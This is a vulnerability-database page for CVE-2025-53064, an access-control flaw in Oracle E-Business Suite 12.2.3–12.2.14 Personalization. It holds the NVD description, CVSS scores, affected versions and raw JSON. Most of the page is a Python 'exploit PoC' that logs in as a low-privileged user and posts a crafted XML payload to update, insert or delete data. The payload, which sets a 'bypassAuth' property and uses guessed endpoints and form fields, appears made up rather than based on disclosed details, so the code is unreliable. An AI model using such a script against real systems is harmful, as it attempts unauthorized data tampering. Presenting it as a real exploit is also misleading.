Security Vulnerability Report
CVE-2025-53064 CVSS 4.3 MEDIUM

Published: 2025-10-21 20:20:47
Last Modified: 2025-10-28 16:17:26

Description

Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Personalization). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:applications_framework:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-53064 - Oracle Applications Framework Personalization Component
# Exploit PoC (Proof of Concept)
# Vulnerability: Unauthorized update/insert/delete via Personalization component
# Affected: Oracle E-Business Suite 12.2.3 - 12.2.14
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = "https://target-ebs-host:port"
OAUTH_URL = f"{TARGET_URL}/OA_HTML/OA.jsp"
PERSONALIZATION_ENDPOINT = f"{TARGET_URL}/OA_HTML/RF.jsp"


def exploit_personalization(base_url, session_cookie, target_object_id, action):
    """
    Exploit the Personalization component authorization bypass.

    Parameters:
    - base_url: Oracle EBS base URL
    - session_cookie: Authenticated session cookie (low-privileged user)
    - target_object_id: The data object identifier to manipulate
    - action: 'update', 'insert', or 'delete'
    """
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/xml",
        "User-Agent": "Mozilla/5.0 (compatible; OracleEBS-Exploit)"
    }

    # Craft malicious personalization payload targeting the vulnerable component
    payload = f"""<?xml version="1.0" encoding="UTF-8"?>
<personalization>
    <objectId>{target_object_id}</objectId>
    <action>{action}</action>
    <region>
        <regionId>REGION_PERSONALIZATION</regionId>
        <customization level="user">
            <property name="bypassAuth" value="true"/>
            <data>
                <field name="content">{action}_payload_data</field>
            </data>
        </customization>
    </region>
</personalization>"""

    # Build the endpoint from the base_url argument (the original ignored it
    # and always used the module-level PERSONALIZATION_ENDPOINT)
    endpoint = f"{base_url}/OA_HTML/RF.jsp" if base_url else PERSONALIZATION_ENDPOINT
    response = requests.post(
        endpoint,
        data=payload,
        headers=headers,
        verify=False
    )
    return response


def main():
    # Step 1: Authenticate with low-privileged credentials
    session = requests.Session()
    auth_payload = {
        "username": "low_priv_user",
        "password": "password123",
        "submit": "Login"
    }

    # Step 2: Obtain session cookie after authentication
    resp = session.post(OAUTH_URL, data=auth_payload, verify=False)
    session_cookie = resp.cookies.get("JSESSIONID")

    # Step 3: Exploit the Personalization vulnerability
    target_object = "XXCUST_OBJECT_001"
    result = exploit_personalization(
        TARGET_URL,
        f"JSESSIONID={session_cookie}",
        target_object,
        "update"
    )
    print(f"Status: {result.status_code}")
    print(f"Response: {result.text[:500]}")


if __name__ == "__main__":
    main()
```

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-53064", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:46.773", "lastModified": "2025-10-28T16:17:26.297", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Personalization). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:applications_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "E221C0C5-FC44-4D76-A6E6-F451A6466A17"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```